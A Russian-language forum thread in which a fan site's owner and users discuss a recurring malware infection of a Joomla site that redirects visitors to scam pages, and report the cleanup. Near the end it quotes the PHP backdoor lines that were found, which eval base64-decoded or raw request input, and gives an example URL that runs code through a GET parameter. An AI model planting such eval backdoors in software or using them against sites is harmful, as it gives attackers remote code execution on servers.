"Предупреждение: у этого сайта плохая репутация"

Rivelin пишет:

Samael пишет: Правда увы подмену ссылок не вижу, т.к. пользуюсь firefox'om да и ещё с плагинами noscript(разрешен весь сайт сейчас, ни чего не заблокировано) и adblock Plus

Что значит, увы?! Радоваться надо, что не перенаправляет на всякие сомнительные сайты.
У меня только Adblock Plus, и подмена ссылок "радует" своей неопределенностью, то на один сайт выкинут, то на другой.
Яндекс уже пришпилил к Локатору уведомление "сайт может угрожать безопасности вашего компьютера и т.д. и т.п."... быстренько они. :dry:

Увы наверно по той причине, что мне показывают предупреждение, но при этом я да же и не увижу что не так на сайте, т.к. у меня всё подозрительное блокируется автоматом...
Да и у меня в фоксе запрещено авто пере направление, т.е. пока я не скажу можно перейти, фокс сам не перейдёт куда либо автоматом. Но в данном случае да же не высвечивается что перенаправляют.
Кстати если важно - версия фокса 14.0.1, но многие системы его видят как 5-ю версию... похоже профиль с той версии имеет и свои "плюсы"(для меня лично это забавно)

Спасибо за информацию! Сразу же взялась править, бросив все дела и планы - сейчас, вроде, перенаправлять не должно. Но яндекс и опера снова будут некоторое время ругаться

Вирус, похоже, тот же самый. Я пыталась заходить с яндекса, меня вобще перенаправляло куда-то, где предлагали номер телефона ввести - вот уж подлые и вонюяие твари эти мошенники, прицепились к сайту, упыри!

Эххх...да что ж такое >_< И из этого напрашивается вывод, что уязвимость еще не найдена и то, что произошло два раза, может повториться и в третий....как же тяжко :pinch: Знать бы, как это не допустить

Может вы не все файлы удалили? Может там еще скрытые остались, которые при запуске создают новые копии.

Ой, не знаю :blush: :whistle: :pinch: А как это проверить?

Вообще о том, что этот вирус может повторяться, давал ссылку Скай...ну как устранить причину я так и не поняла...но сейчас, вроде, нормально заходится по внешним ссылкам :S но неизвестно, когда ждать следующей атаки

PS я сегодня уже удаляла какие то левые файлы...но не уверена, все ли это ...

На ссылку которую давал skyblade в коментариях 6-го числа ругается мой антивирус - это нормально?

А как это проверить?

Может другим антивирусом, 100% вирусов ни один антивирус не находит, да же касперский.

Правда если про скрытые, тогда наверно надо Сделать видимыми невидимые и системные файлы, если правда система работы с FTP/сайтом такая же как и с виндой...
Увы в подобном я ноль, только знаю что примерно надо делать если вирус на компе и как примерно с ним бороться.

На ссылку которую давал skyblade в коментариях 6-го числа ругается мой антивирус - это нормально?

хмм..это настораживает. Вообще я доверяю Скаю, и не думаю, что он стал бы давать такую ссылку с вирусом, хотя, с тем сайтом и могут быть проблемы...но у меня не ругается :huh:

Может другим антивирусом, 100% вирусов ни один антивирус не находит, да же касперский

Проверяла Нодом, а потом Мальварой...даж не знаю :S

Как на винде найти скрытые файлы я тоже представляю, но вот в ФТП... :huh: разве что пошарить в резервной копии...

Спасибо! :blush: Я, кажется, нашла $_POST еще в нескольких файлах, сейчас уже поздняя ночь, доделался бекап (ох как же он долго делается), в общем, завтра значит будем удалять эти посты и евалы еще раз, и действительно если что не получится, то могу даже дать доступ в фтп, потому что это дело очень важное и сайт надо спасать , а ты, по ходу, действительно в этом понимаешь намного больше, чем я -некоторые вещи, что писал, я вообще не поняла - в частности, как сделать запрет на выполнение кода и как проверить Айболитом. Насчет крайнего случая, надеюсь, что все таки дело не дойдет, там очень много править, и вручную искать разницу с исходной джумлой тоже крайне тяжко доступ к логам не нашла, и дату посмотреть тоже не могу, потому что уже недавно эти файлы восстанавливала и перезаписывала из бекапа, когда лечила, и еще не думала, что повторно всплывет эта зараза.

Что касается портирования, лучше отдельной темой это обсудить, я думаю, что почему бы и нет, действительно ^__^ Правда если портировать Фентези Стар, то лучше обсудить с главным автором, а у меня как раз подозрение, что эта игра больше всего может подойти для этих целей если что, все необходимые материалы готова выдать, может, что-то и выйдет классное

Нам вроде, удалось найти источник этой заразы, и если что, теперь все под контролем. Вчера сайт был недоступен по этой технической причине.

Нашли еще

./components/com_media/movie.php:eval(base64_decode($_POST["dir"]));
./images/banners/movie.php:eval(base64_decode($_POST["dir"]));

Файл movie.php как раз этот скрипт распространял.

Файл /language/en-GB/en_GB.php
if (isset($_REQUEST)) eval(stripslashes($_REQUEST));

$_REQUEST - это глобальный массив, туда входит и $_POST и $_GET, тоесть здесь еще веселее - код исполнится даже через get, тоесть прямо в окне браузера пишем:
сайт/language/en-GB/en_GB.php?en=phpinfo();

И еще эту бяку нашли. И в логе - шелл.

Огромное спасибо alphabravo за помощь!